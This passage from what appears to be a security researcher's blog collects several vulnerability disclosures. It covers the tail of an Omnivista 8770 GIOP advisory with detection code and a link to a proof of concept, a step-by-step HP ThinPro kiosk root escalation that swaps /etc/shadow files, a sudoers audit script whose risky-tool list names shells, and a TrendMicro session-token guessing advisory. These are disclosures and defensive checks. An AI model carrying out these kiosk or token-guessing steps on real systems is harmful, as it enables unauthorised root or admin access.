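        request_id, response_expected = r.ulong(), bool(r.octet())
        if minor == 1:
            r.raw(3)                    # reserved
        object_key, operation = r.octets(), r.string()
        r.octets()                      # requesting_principal, ignored
    else:                               # RequestHeader_1_2
        request_id = r.ulong()
        response_expected = (r.octet() & 0x3) == 0x3   # response_flags
        r.raw(3)                        # reserved
        if r.ushort() != KEY_ADDR:
            raise ValueError("only KeyAddr targets are handled here")
        object_key, operation = r.octets(), r.string()
        ctx = r.service_contexts()
        r.align(8)                      # 1.2: stub data starts 8-byte aligned
    return {"version": (msg[4], minor), "request_id": request_id, "operation": operation,
            "response_expected": response_expected, "object_key": object_key,
            "service_contexts": ctx, "stub_data": msg[r.pos:12 + size]}


def build_request_1_2(request_id, object_key, operation, stub_data=b"", little_endian=True):
    """Encode a GIOP 1.2 Request (inverse of parse_request) to construct sample traffic."""
    fmt, out = ("<" if little_endian else ">"), bytearray(12)   # header is filled in last
    def pad(n):
        out.extend(b"\0" * ((-len(out)) % n))
    def ulong(v):
        pad(4)
        out.extend(struct.pack(fmt + "I", v))
    ulong(request_id)
    out.extend(b"\x03\0\0\0")           # response_flags = 0x3 (reply expected), reserved[3]
    pad(2); out.extend(struct.pack(fmt + "H", KEY_ADDR))
    ulong(len(object_key)); out.extend(object_key)        # sequence<octet> object_key
    op = operation.encode("latin-1") + b"\0"
    ulong(len(op)); out.extend(op)                        # CDR string, NUL counted in length
    ulong(0)                            # empty service context list
    if stub_data:
        pad(8); out.extend(stub_data)
    out[:12] = b"GIOP" + bytes([1, 2, int(little_endian), GIOP_REQUEST]) + struct.pack(fmt + "I", len(out) - 12)
    return bytes(out)


def flag_scheduler_calls(messages, trusted_hosts=()):
    """Return (src, request_id, operation) for scheduler calls from hosts not in trusted_hosts."""
    hits = []
    for src, raw in messages:           # (src_ip, giop_message) pairs reassembled from TCP 30024
        try:
            req = parse_request(raw)
        except ValueError:
            continue                    # replies, fragments, non-GIOP data
        if req["operation"].lower() in SCHEDULER_OPS and src not in trusted_hosts:
            hits.append((src, req["request_id"], req["operation"]))
    return hits
```
<br />
flag_scheduler_calls returns one tuple per scheduler operation that reached the ORB from a host outside the trusted set, which is the check a network sensor can apply until the firewall restriction the vendor recommends is in place.<br />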
<b>PoC - Exploit</b><br />
<br />
Github - python script - <a href="https://github.com/malerisch/omnivista-8770-unauth-rce">https://github.com/malerisch/omnivista-8770-unauth-rce</a><br />
<br />
<b>Video</b><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i9.ytimg.com/vi/aq37lQKa9sk/default.jpg?sqp=CPz0_8EF&rs=AOn4CLAA3AsfZB8jtiR6MHpGUzPeInrpYQ" frameborder="0" height="266" src="https://www.youtube.com/embed/aq37lQKa9sk?feature=player_embedded" width="320"></iframe></div>
<br />
<b>Affected versions:</b><br />
<br />
Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.<br />
<br />
<br />
<b>Disclosure Timeline</b><br />
<ul>
<li>16/02/2016 - First contact</li>
<li>16/02/2016 - Response from HSSE to contact Alcatel Lucent</li>
<li>26/04/2016 - Report sent to PSIRT Alcatel Lucent</li>
<li>26/04/2016 - Response from Nokia PSIRT</li>
<li>27/04/2016 - New contact provided by Nokia - PSIRT Alcatel Lucent</li>
<li>09/05/2016 - PSIRT provides temporary license and software download</li>
<li>18/05/2016 - Vendor provides download link and temporary license to verify whether version 3.0 is also affected</li>
<li>30/06/2016 - Version 2.6 is also vulnerable</li>
<li>01/07/2016 - Version 3.0 also confirmed as vulnerable</li>
<li>01/08/2016 - Patch should be available in November</li>
<li>29/10/2016 - Vendor confirms patches for SQLi and XSS vulnerabilities in the product, but no CVE or patch has been assigned for this issue. The vendor's position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients from connecting to the Omnivista server.</li>
<li>02/12/2016 - Contacted Mitre to obtain a CVE; the CVE assigned is <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9796">CVE-2016-9796</a></li>
</ul>
<br />
<b>References and interesting links:</b><br />
<ul>
<li>GIOP - <a href="https://en.wikipedia.org/wiki/General_Inter-ORB_Protocol">https://en.wikipedia.org/wiki/General_Inter-ORB_Protocol</a></li>
<li>CORBA specification - The Common Object Request Broker: Architecture and Specification 2.6.1 - <a href="http://www.omg.org/spec/CORBA/2.6.1/PDF/">http://www.omg.org/spec/CORBA/2.6.1/PDF/</a></li>
<li>Under the hood: IORs, GIOP and IIOP - IBM - <a href="http://www.ibm.com/developerworks/library/ws-underhood/">http://www.ibm.com/developerworks/library/ws-underhood/</a></li>
</ul>
<br />
Roberto Suggi Liverani, 2016-10-03<br />
<b>Pwning a thin client in less than one minute, again!</b><br />
Back in 2015, I published a blog post titled "<a href="http://blog.malerisch.net/2015/04/pwning-hp-thin-client.html">Pwning a thin client in less than two minutes</a>", which attracted a lot of curiosity on the Internet and was also featured on the <a href="http://hackaday.com/2015/04/29/hacking-a-thin-client-to-gain-root-access/">HACKADAY</a> blog.<br />
<br />
Today, together with Vincent Hutsebaut (<a href="https://twitter.com/vhutsebaut">@vhutsebaut</a>), we are releasing a further technique to pwn the same thin client and get a root shell without authentication, in less than one minute!<br />
<br />
The attack detailed below is a typical kiosk attack, consisting of a local privilege escalation which affects different versions of HP ThinPro OS (HP ThinPro 4.4, HP ThinPro 5.0, HP ThinPro 5.1, HP ThinPro 5.2, HP ThinPro 5.2.1, HP ThinPro 6.0, HP ThinPro 6.1).<br />
<br />
The vulnerability (CVE-2016-2246) has been patched by HP and a technical bulletin has been <a href="https://h20565.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c05291676">published</a>. HP stated that they had already fixed the issue before our report was sent to them and were about to publish a security bulletin when we contacted them.<br />
<br />
Since the patch is out, let's dive into the vulnerability, which is detailed step by step below.<br />
<br />
For those of you in a rush, feel free to skip to the bottom of this post and watch the video.<br />
As usual, if you enjoy it, the authors would love to see this article shared and retweeted ;-)<br />
<b>Description</b><br />
<br />
In HP ThinPro OS, the sudo configuration allows an unauthenticated user to abuse the keyboard layout tool to perform a privilege escalation attack and gain unauthorised root access on the machine.<br />
<br />
The keyboard layout tool (located in "/usr/bin/hptc-keyboard-layout") runs as a privileged process and is directly available to an unauthenticated user from the UI (user interface) of the HP ThinPro kiosk.<br />
<br />
By abusing the available UI controls, an unauthenticated user can navigate the file system and restore the original /etc/shadow file on the system, which then allows setting a new admin password on the system.<br />
<div>
<br /></div>
<div>
<div>
<b>Conditions</b></div>
<div>
<br /></div>
<div>
The following conditions are required:</div>
<div>
<br /></div>
<div>
- HP ThinPro OS set in kiosk mode;</div>
<div>
- HP ThinPro OS administrator password has already been set by an administrator;</div>
<div>
- A malicious user has physical access to the Kiosk but does not have a user account and does not know the admin password.</div>
</div>
<div>
<br /></div>
<div>
<div>
<b>Steps to reproduce (as a malicious user)</b></div>
<div>
<br /></div>
<div>
1) Click the "Control Panel" icon on the left side, then click the "Keyboard Layout" icon. Note that the button and UI may differ depending on the OS version, but the keyboard layout tool is available to an unauthenticated user in kiosk mode.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Step 1 – Figure 1<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2URaUgdMKI9YGn8GaMnjcp-kByL5_Ose19eNLhuiXy0fSXQJRqXggOgrSMIq2ekzKYGZJp1TMlC413J617YYPaqNFXLZ_qd6fCCMEV7B7aggaN6qJG3-s18PR0OGSVhjPMYLKP5C19o/s1600/s1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2URaUgdMKI9YGn8GaMnjcp-kByL5_Ose19eNLhuiXy0fSXQJRqXggOgrSMIq2ekzKYGZJp1TMlC413J617YYPaqNFXLZ_qd6fCCMEV7B7aggaN6qJG3-s18PR0OGSVhjPMYLKP5C19o/s640/s1.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
2) Click the print icon; a "Print File" dialog is shown to the user</div>
<div>
<br /></div>
<div>
Step 2 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIKEyBQxXCdX7xrRnbbGgZSrJckxaQDntTeVYSpZLwflANOwBZfCedihTr9C7zdZdeNkU9v5rQfp6gx6k2CswXj3lmiev-VL93v0pNvlSEdceHSu5fzk0F_bYUv4N5xiKWXtXZ9bf2Sc/s1600/s2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIKEyBQxXCdX7xrRnbbGgZSrJckxaQDntTeVYSpZLwflANOwBZfCedihTr9C7zdZdeNkU9v5rQfp6gx6k2CswXj3lmiev-VL93v0pNvlSEdceHSu5fzk0F_bYUv4N5xiKWXtXZ9bf2Sc/s640/s2.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
3) The Print File dialog allows an "output file" to be set; clicking the "..." button opens a folder chooser</div>
<div>
<br /></div>
<div>
Step 3 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3v4Q9ZpJEiThgJmHHoSL59bXz6y2jfYsPJOG9y-AOCNj5zrdKOjpQ7t2glrmCYE_eBLKFDolvt_6X4vjDNmJaoPiDQCPSSBFczUK1S_9czu5TIyLXUq6Gak31F3jMzFm4VLaly6T5FXU/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3v4Q9ZpJEiThgJmHHoSL59bXz6y2jfYsPJOG9y-AOCNj5zrdKOjpQ7t2glrmCYE_eBLKFDolvt_6X4vjDNmJaoPiDQCPSSBFczUK1S_9czu5TIyLXUq6Gak31F3jMzFm4VLaly6T5FXU/s640/s3.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 3 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwt27WYWLdiM9E-0XJTyq-NEVdGiU83Bx9tim4BrepySA9uScwHy3kz794jnM2ifsOFm5zMKAboDs-h0DhQe69c5aFVph1scPjgPpNsv3FxdDdCASxW9guUA-K8WnW9d5pBHtl_HKVss/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="482" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdwt27WYWLdiM9E-0XJTyq-NEVdGiU83Bx9tim4BrepySA9uScwHy3kz794jnM2ifsOFm5zMKAboDs-h0DhQe69c5aFVph1scPjgPpNsv3FxdDdCASxW9guUA-K8WnW9d5pBHtl_HKVss/s640/s4.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
4) Navigate to /etc/ folder</div>
<div>
<br /></div>
<div>
Step 4 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZEQxiIpNLXRB1hHNvoVRzcKbQhzoOgYouTxQw2KTehyphenhyphen8mZLYD_HTdARWEPkHeZTebPaI9R1uOI3CZuE_3MjvM-8fYALnyPHkCI8_Tp-ZUChKwlbBAPcoux5pGzXfchbtMJYt1uL1Lk8/s1600/s5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="504" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQZEQxiIpNLXRB1hHNvoVRzcKbQhzoOgYouTxQw2KTehyphenhyphen8mZLYD_HTdARWEPkHeZTebPaI9R1uOI3CZuE_3MjvM-8fYALnyPHkCI8_Tp-ZUChKwlbBAPcoux5pGzXfchbtMJYt1uL1Lk8/s640/s5.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
5) Rename /etc/shadow into /etc/shadow-last-modified-by-admin</div>
<div>
<br /></div>
<div>
Step 5 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5fVmlGm0jvAmKHS11A3-isCM0UwjtrMJFWGjmBfNLKdpq5cC_1p804rjFryW_Xbla_F0i63cBHH7uyctCePn4bY2p3zOo0rWbNPmpV2Vo_6Z932nBh2O5zvA2mCqm6WD1A17Z-PBZ_Tg/s1600/s6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5fVmlGm0jvAmKHS11A3-isCM0UwjtrMJFWGjmBfNLKdpq5cC_1p804rjFryW_Xbla_F0i63cBHH7uyctCePn4bY2p3zOo0rWbNPmpV2Vo_6Z932nBh2O5zvA2mCqm6WD1A17Z-PBZ_Tg/s640/s6.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 5 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiFzoVcfHDm0RHmc3ioOFP7wHtF2AcXVjwdyBnzLIYNhbexbYUgAJ87TZGv3cq2p8JhvDKAaVjRBq01y7lXZdWGSxFp3hWfKOuJbVVaQmgUhsm57-F-cfVU4cPsWhEtRHvPGv_OMW1E4/s1600/s7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="478" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAiFzoVcfHDm0RHmc3ioOFP7wHtF2AcXVjwdyBnzLIYNhbexbYUgAJ87TZGv3cq2p8JhvDKAaVjRBq01y7lXZdWGSxFp3hWfKOuJbVVaQmgUhsm57-F-cfVU4cPsWhEtRHvPGv_OMW1E4/s640/s7.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
6) Rename /etc/shadow- into /etc/shadow</div>
<div>
<br /></div>
<div>
Step 6 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5o-Igo8nuc-mFkqfAFe5vKUtUxBdbwlQRUBWmY56F61sPP2juZ_lnphgzn0xm0tTxRIa_25y_Y4ejuko4-uiezS48CrJKwSYK9PZlBAgDfyda4EpFQD63A0OoD6Dm_nT40G2t5AMrtuU/s1600/s9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5o-Igo8nuc-mFkqfAFe5vKUtUxBdbwlQRUBWmY56F61sPP2juZ_lnphgzn0xm0tTxRIa_25y_Y4ejuko4-uiezS48CrJKwSYK9PZlBAgDfyda4EpFQD63A0OoD6Dm_nT40G2t5AMrtuU/s640/s9.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
7) Click on the "Administrator/User Mode Switch"</div>
<div>
<br /></div>
<div>
Step 7 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzWaQ0tUdzDyttGrZBdgHlJ-C25fWTIpGHap0UZylpjN66ZG-LnGlLF0fjFjHHqKSUAUWNjHvfXmmzgCmL4wFdxvbXvqiKMN9vLDSPz8b1OQllArT824UQIwqPuOdFlMi2qpKtGV9p5Y/s1600/s10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="458" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJzWaQ0tUdzDyttGrZBdgHlJ-C25fWTIpGHap0UZylpjN66ZG-LnGlLF0fjFjHHqKSUAUWNjHvfXmmzgCmL4wFdxvbXvqiKMN9vLDSPz8b1OQllArT824UQIwqPuOdFlMi2qpKtGV9p5Y/s640/s10.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
8) Malicious user can set a new admin password and access the administrator mode of the kiosk</div>
<div>
<br /></div>
<div>
Step 8 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTr-OaJGhB9ppGszAjses0Ji76Di-UYvn46owEKdvqnhBU9XzElBu6h2xNQY_Pp80NsbXWhwe6ujxMZ7inZzLd8nIU03QbXDb_ORh06bHcAuwTZhEFxN_mEbvDTqKzqMx_a58KCZQU-vE/s1600/s11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTr-OaJGhB9ppGszAjses0Ji76Di-UYvn46owEKdvqnhBU9XzElBu6h2xNQY_Pp80NsbXWhwe6ujxMZ7inZzLd8nIU03QbXDb_ORh06bHcAuwTZhEFxN_mEbvDTqKzqMx_a58KCZQU-vE/s640/s11.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div>
9) Launch an X terminal with root access</div>
<div>
<br /></div>
<div>
Step 9 – Figure 1</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSDUWc93OuOLsTQY6BU7W6HLXVodrDANEEogXdQgFVtG4D0CnEKR3S9hZI7DkL1LVS8Z1O_Xr5L0ErcIp9J1-2AYhWClElA9vBi-Du0Y23kxvOV-wyKAnhVnulRVKQ1imudsD8O5Sk4VM/s1600/s12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSDUWc93OuOLsTQY6BU7W6HLXVodrDANEEogXdQgFVtG4D0CnEKR3S9hZI7DkL1LVS8Z1O_Xr5L0ErcIp9J1-2AYhWClElA9vBi-Du0Y23kxvOV-wyKAnhVnulRVKQ1imudsD8O5Sk4VM/s640/s12.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Step 9 – Figure 2</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSPXypEOlEqj3oX_E21au6i8OPA9rlh5GvNiHUGChRWr1CjTXdaqKk23AfBClyG8vUYlodGZ7SzNb8o6RickLW9B0bpq6lcC6lEugwgNbBxXdiKTp5Wyf2C_VyOMYqwqYFPXQyY5XdCU/s1600/s13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimSPXypEOlEqj3oX_E21au6i8OPA9rlh5GvNiHUGChRWr1CjTXdaqKk23AfBClyG8vUYlodGZ7SzNb8o6RickLW9B0bpq6lcC6lEugwgNbBxXdiKTp5Wyf2C_VyOMYqwqYFPXQyY5XdCU/s640/s13.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
<b>Further observations</b></div>
<div>
<br /></div>
<div>
The /etc/shadow- file remains the original one even after the admin password has been changed multiple times. In this example, the password has already been set twice, but shadow- is still the one set originally in the OS image (back in 2013), which makes the attack described possible.</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6N9hicstCHAQjouUv379dqweZo25otBfgpXYYyzBcHJNfSdm0yMFEqtzO0QxHJZkBN78FS1qQrcnShAezN9DiMs9hugYQhiGs5AeaLRC6ApB5YBuYMFOWmhHyTygfdl9_TLHKw6ySUU/s1600/s14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="408" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb6N9hicstCHAQjouUv379dqweZo25otBfgpXYYyzBcHJNfSdm0yMFEqtzO0QxHJZkBN78FS1qQrcnShAezN9DiMs9hugYQhiGs5AeaLRC6ApB5YBuYMFOWmhHyTygfdl9_TLHKw6ySUU/s640/s14.png" width="640" /></a></div>
<div>
<br /></div>
<div>
In the sudoers configuration, the NOPASSWD tag is set for the Keyboard Layout tool (/usr/bin/hptc-keyboard-layout):</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9JukSnf9Gm2ivIV4ZVLOKAPgpFdNSdyKkRUV1YJ2nRR1XRz3v1KJTUXFNNnpyofEfqEb_I8EHsaUo-ohgLCynWJ5RO7486gSkD6UeOvmTEnymYcSmJdZKkoLZW8TufLqFvC2ZnFfkWHE/s1600/s15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="614" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9JukSnf9Gm2ivIV4ZVLOKAPgpFdNSdyKkRUV1YJ2nRR1XRz3v1KJTUXFNNnpyofEfqEb_I8EHsaUo-ohgLCynWJ5RO7486gSkD6UeOvmTEnymYcSmJdZKkoLZW8TufLqFvC2ZnFfkWHE/s640/s15.png" width="640" /></a></div>
<div>
<br /></div>
<div>
Below, a video showing the entire sequence:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/20d1Ti4eADc/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/20d1Ti4eADc?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
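<div>
The two root causes above (a NOPASSWD sudoers entry for a tool that opens a root-privileged file dialog, and a stale /etc/shadow- backup) can be audited from the configuration files themselves. The Python script below is an added example, not HP's code: the sudoers and shadow contents in it are constructed samples (only the /usr/bin/hptc-keyboard-layout entry mirrors the screenshot), the password hashes are placeholders, and it assumes the kiosk admin account is root.</div>

```python
"""Audit checks for the two weaknesses behind the HP Thin Pro kiosk issue:
a NOPASSWD sudoers entry for an interactive GUI tool, and a stale
/etc/shadow- backup whose hash no longer matches /etc/shadow.
Added example, not HP's code; all sample file contents are constructed."""
import os
import re

# Constructed sudoers excerpt. Only the hptc-keyboard-layout line mirrors the
# entry visible in the post's screenshot; the other lines are made up.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%kiosk  ALL=(root) NOPASSWD: /usr/bin/hptc-keyboard-layout
user    ALL=(root) NOPASSWD: /usr/bin/hptc-timezone, /sbin/reboot   # constructed
"""

# Constructed shadow files with placeholder hashes (not real password hashes).
SAMPLE_SHADOW = ("root:$6$CURRENTSALT$CURRENTHASH:17000:0:99999:7:::\n"
                 "user:*:17000:0:99999:7:::\n")
SAMPLE_SHADOW_BACKUP = ("root:$6$OLDSALT$OLDHASH:15900:0:99999:7:::\n"
                        "user:*:15900:0:99999:7:::\n")

NOPASSWD_RE = re.compile(r"NOPASSWD:\s*(.+)$")

# Sudo targets that hand the caller a root shell, editor or file dialog:
# any of these lets an unauthenticated kiosk user browse and rename files as root.
INTERACTIVE_TOOLS = {"hptc-keyboard-layout", "xterm", "sh", "bash", "vi", "vim", "nano", "ALL"}


def nopasswd_commands(sudoers_text):
    """Return (user_spec, command) pairs that sudo will run without a password.
    Comments are dropped; '#include' directives are not followed."""
    found = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = NOPASSWD_RE.search(line)
        if not m:
            continue
        user_spec = line.split()[0]
        for cmd in m.group(1).split(","):
            found.append((user_spec, cmd.strip()))
    return found


def risky_nopasswd(sudoers_text):
    """NOPASSWD targets whose program name is an interactive tool (see INTERACTIVE_TOOLS)."""
    return [(user_spec, cmd) for user_spec, cmd in nopasswd_commands(sudoers_text)
            if os.path.basename(cmd.split()[0]) in INTERACTIVE_TOOLS]


def password_hash(shadow_text, user):
    """Hash field (second colon-separated field) for `user`, or None if absent."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) > 1 and fields[0] == user:
            return fields[1]
    return None


def backup_restores_old_password(shadow_text, backup_text, user="root"):
    """True when the backup still carries an older hash for `user`, i.e. renaming
    it over /etc/shadow would silently revert that account's password.
    The admin account is assumed to be root (assumption, not stated in the post)."""
    current, old = password_hash(shadow_text, user), password_hash(backup_text, user)
    return old is not None and old != current


if __name__ == "__main__":
    for user_spec, cmd in risky_nopasswd(SAMPLE_SUDOERS):
        print(f"NOPASSWD interactive tool: {user_spec} -> {cmd}")
    if backup_restores_old_password(SAMPLE_SHADOW, SAMPLE_SHADOW_BACKUP):
        print("shadow backup holds an older root hash: remove it or keep it in sync")
```

<div>
On a real device the same functions take the contents of /etc/sudoers (and /etc/sudoers.d/*) and of /etc/shadow and /etc/shadow-; a hit from either check means the fix is to drop NOPASSWD for GUI tools that embed a file chooser, and to delete or refresh the stale backup so it never holds a hash older than the current one.</div>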
<div>
If you like kiosks and more in particular you like to break them, then you absolutely need to try: <a href="http://ikat.ha.cked.net/">http://ikat.ha.cked.net/</a> . Greetz to Paul Craig, the "self-proclaimed" king of kiosks! ;-)</div>
Roberto Suggi Liverani<br />
<br />
<b>Microsoft Windows PDF Library Information Disclosure Vulnerability - CVE-2016-3374 (MS16-115)</b> (2016-09-14; updated 2018-07-08)<br />
<br />
In the last year, as a personal research project, I started to look more into browsers and decided to fuzz some high-level targets, such as Edge and IE11, together with <a href="http://srcincite.io/">Steven Seeley</a> (<a href="https://twitter.com/steventseeley">@steventseeley</a>).<br />
<br />
I have to admit that it is quite hard nowadays to approach this kind of research, especially with limited time and resources (just a few virtual machines running at home…), but nevertheless it became an incredible learning experience.<br />
<br />
Given our constraints, the fuzzing focus was to target components other than the commonly targeted ones, such as DOM, JavaScript and so on, so we decided to go for the PDF file format.<br />
<br />
One of the interesting conditions that we found was the one that has just been patched by Microsoft and detailed in the <a href="https://technet.microsoft.com/library/security/MS16-115">MS16-115</a> security bulletin. The vulnerability is an out-of-bounds read which can lead to memory information disclosure.<br />
<br />
The technical advisory can be found at Steven Seeley's web site: <a href="http://srcincite.io/advisories/src-2016-0039/">http://srcincite.io/advisories/src-2016-0039/</a> .<br />
<div>
<br /></div>
<div>
References:</div>
<div>
<br /></div>
<div>
- Microsoft Security Bulletin MS16-115: <a href="https://technet.microsoft.com/library/security/MS16-115">https://technet.microsoft.com/library/security/MS16-115</a></div>
<div>
- SRC-2016-39: Microsoft Windows PDF Library PostScript Calculator Out-of-Bounds Read Information Disclosure Vulnerability: <a href="http://srcincite.io/advisories/src-2016-39/">http://srcincite.io/advisories/src-2016-39/</a><br />
- Microsoft Acknowledgments: <a href="https://technet.microsoft.com/library/security/mt674627.aspx">https://technet.microsoft.com/library/security/mt674627.aspx</a></div>
Roberto Suggi Liverani<br />
<br />
<b>TrendMicro ScanMail for Microsoft Exchange (SMEX) predictable session token - CVE-2015-3326</b> (2016-05-20)<br />
<br />
It's time for another advisory (<a href="http://www.cvedetails.com/cve/CVE-2015-3326/">CVE-2015-3326</a>), a simple one, for a vulnerability which can be found quickly and trivially. For those of you who just want to glance at the post, I suggest looking directly at the picture, which says it all!<br />
<br />
The following vulnerability was discovered on TrendMicro SMEX (ScanMail for Microsoft Exchange) 10 SP2 but it affects <a href="http://esupport.trendmicro.com/solution/en-US/1109669.aspx">other versions</a> as well.<br />
<br />
While surfing the SMEX web administrative interface using a web proxy, I noticed something in the HTTP request: the session token itself and its format, a number.<br />
<br />
After observing a significant number of logins, the session token was always represented by a number of minimum 4 and maximum 5 digits, as shown in the screenshot below:<br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJuIjtjHHC4BxqIRLTHmr5WX1G0gVqHiQtF-d3s5sKBRD_S0cH8g0t39i7QZ1lvh9rm0kfN0N6FVuGByImDgeYnqKLUGDFe2DVbKJ1quz3Y61focJDSyk4jNUAJTYRg7SK7vehOE1INk/s1600/s1.png" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoJuIjtjHHC4BxqIRLTHmr5WX1G0gVqHiQtF-d3s5sKBRD_S0cH8g0t39i7QZ1lvh9rm0kfN0N6FVuGByImDgeYnqKLUGDFe2DVbKJ1quz3Y61focJDSyk4jNUAJTYRg7SK7vehOE1INk/s640/s1.png" width="640" /></a></div>
<br />
Although the observed session tokens were never generated sequentially, the lack of a cryptographically strong PRNG for the session identifier allows a malicious user to trivially guess the token. This attack can be easily automated.<br />
<br />
For example, in Burp proxy, the cool feature of <a href="https://portswigger.net/burp/help/intruder_using.html#uses_enumerating">Intruder</a> combined with a "<a href="https://portswigger.net/burp/help/intruder_payloads_types.html#numbers">number</a>" payload and even a single thread would suffice to guess a valid session token in a reasonable time.<br />
<br />
By targeting a "protected" page of SMEX administrative interface as a baseline request for Intruder and by examining the HTTP response, it is possible to infer whether the session token is valid or not.<br />
<br />
Once a valid token is obtained, a malicious user can impersonate another user's session on the system and gain unauthorised access to the SMEX administrative interface.<br />
<br />
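<div>
As an added example (not Trend Micro's code), the script below quantifies what the observation above means for a defender: it infers the token keyspace from captured samples, computes the expected number of guesses an attacker needs, and contrasts that with a token drawn from the OS CSPRNG. The sample tokens are constructed to match the 4-5 digit format described, not values from the post, and the 64-bit threshold follows OWASP's session-identifier guidance.</div>

```python
"""Estimate how guessable a session-token format is from captured samples and
contrast it with a properly generated token. Added example, not Trend Micro's
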